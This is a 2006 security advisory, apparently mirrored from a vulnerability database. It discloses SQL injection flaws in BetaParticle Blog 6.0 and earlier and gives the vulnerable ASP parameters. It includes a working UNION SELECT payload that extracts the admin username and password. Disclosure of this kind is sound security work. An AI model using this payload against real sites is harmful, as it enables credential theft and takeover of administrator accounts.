Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11861
HistoryMar 19, 2006 - 12:00 a.m.

Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities

2006-03-1900:00:00
vulners.com
14

–Security Report–
Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection
Vulnerabilities

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 18/03/06 05:27 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: BetaParticle (http://www.betaparticle.com/&#41;
Version: 6.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query.
Level: Critical

How&Example:
GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery]
GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]
Example ->
http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1
With this example remote attacker could get admin's pass and can login from
/main.asp

Timeline:

  • 18/03/2006: Vulnerability found.
  • 18/03/2006: Contacted with vendor and waiting reply.

Exploit:
Click here and get exploit for this advisory